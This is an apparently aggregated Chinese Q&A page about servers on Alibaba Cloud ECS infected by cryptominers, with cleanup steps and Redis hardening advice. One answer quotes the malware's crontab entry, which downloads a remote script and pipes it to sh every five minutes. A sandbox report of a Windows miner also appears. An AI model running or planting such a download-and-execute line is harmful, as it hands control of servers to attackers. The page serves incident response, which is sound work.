阿里云ecs遇到挖矿进程

❶ 阿里云ECS服务器对外攻击，怎么解决

服务器被黑了，保存数据，重做系统。服务器

❷ 阿里云服务器被挖矿了怎么办(纯纯电脑小白

1. 关闭访问挖矿服务器的访问

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉执行权限， 在没有找到根源前，千万不要删除 minerd，因为删除了，过一回会自动有生成一个。

3. pkill minerd ,杀掉进程

4. service stop crond 或者 crontab -r 删除所有的执行计划

5. 执行top，查看了一会，没有再发现minerd 进程了。

6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。

下载脚本的语句：

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件内容如下，感兴趣的可以研究下：

View Code

解决minerd并不是最终的目的，主要是要查找问题根源，我的服务器问题出在了redis服务了，黑客利用了redis的一个漏洞获得了服务器的访问权限，http://blog.jobbole.com/94518/然后就注入了病毒，下面是解决办法和清除工作：

1. 修复 redis 的后门,

配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.
配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.
配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
好消息是Redis作者表示将会开发”real user”，区分普通用户和admin权限，普通用户将会被禁止运行某些命令，如conf
2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号

3. 查看你的用户列表，是不是有你不认识的用户添加进来。 如果有就删除掉.

❸ 阿里云服务器ECS CPU老是被一个程序占满100%

是一个mc-serv生成的病毒文件，

风险简述 高危
安装windows自启动项
运行信息 Windows XP SP3 + PDF11
可疑行为特征
[-]安装windows自启动项(1)
[-]file
"C:\\WINDOWS\\win.ini"
进程树

.exe

文件释放
[+]libeay32.dll
[+]zlib1.dll
[+]libwinpthread-1.dll
[+]mscl.exe
[+]ssleay32.dll
[+]libcurl-4.dll
[+]__tmp_rar_sfx_access_check_35958766
行为细节
[-].exe(当前进程号:1984，父进程号:1060)(1630)
[+]系统函数调用
[+]进程函数调用
[+]注册表函数调用
[+]文件函数调用
[+]其它函数调用

❹ 阿里云允许用云主机挖矿吗

VPS提供商一般都不允许云主机进行挖矿，一旦发现就会被封禁，而且本来就对挖矿进行了限制，本身你就无法使用云主机进行挖矿，而且性能也达不到挖矿的标准。

❺ 阿里云ECS服务器CPU占用较高时，该如何处理

这种情况可以考虑是被挖矿了，可以找到云市场云顶云寻求帮助，一般这种情况会让工程师进行排查找出问题所在，然后再进行修理，大概的时间一般是三天以内

❻ 阿里云centos 被门罗币病毒入侵了，netstat -anp找不到进程号，如何结束进程，但不能重启服务器

ps aux看进程号，根据进程号找到病毒文件位置，先不要删除，先看下crontab -e，是否有异常任务，再看下自己家目录下是否有异常文件或者改动，还有就是开机启动文件是否有写过任务。。。。如果你不是很懂linux系统的话，建议备份数据重装吧（小心伪装成数据文件）。因为删除起来确实很麻烦，我删了一下午才搞定

❼ windows服务器的挖矿进程怎么关闭删除

这种病毒腾讯安全提到过
可以去下载安装一个腾讯御点
打开之后，使用里面的病毒查杀功能，直接就可以查杀这种电脑病毒了

❽ 阿里云windows服务器中了挖矿的病毒怎么清理

光删除没用的，因为没有解决好漏洞。
建议是重做系统，然后找护卫神给你做一下系统安全加固，把漏洞彻底堵住才有效果。

❾ 9696.exe是什么文件

对于这个进程你可以使用360安全卫士主界面的更多里边的360任务管理器来查看它是哪个软件的，如果觉得有问题可以在安全模式下来杀毒看看。

❿ 阿里云ecs服务器进程异常行为windows异常帐号创建要怎么解决

小鸟云服务器niaoyun实例创建好之后，您可以使用以下任意一种方式登录服务器：

远程桌面连接(,MSTSC)：采用这种方式登录，请确保实例能访问公网。如果在创建实例时没有购买带宽，则不能使用远程桌面连接。

管理终端VNC：无论您在创建实例时是否购买了带宽，只要您本地有网页浏览器，都可以通过管理控制台的管理终端登录实例。

使用远程桌面连接(MSTSC)登录实例

打开开始菜单>远程桌面连接，或在开始菜单>搜索中输入mstsc。也可以使用快捷键Win+R来启动运行窗口，输入mstsc后回车启动远程桌面连接。

在远程桌面连接对话框中，输入实例的公网IP地址。单击显示选项。

输入用户名，如小鸟云默认为niaoyun。单击允许我保存凭据，然后单击连接。这样以后登录就不需要手动输入密码了。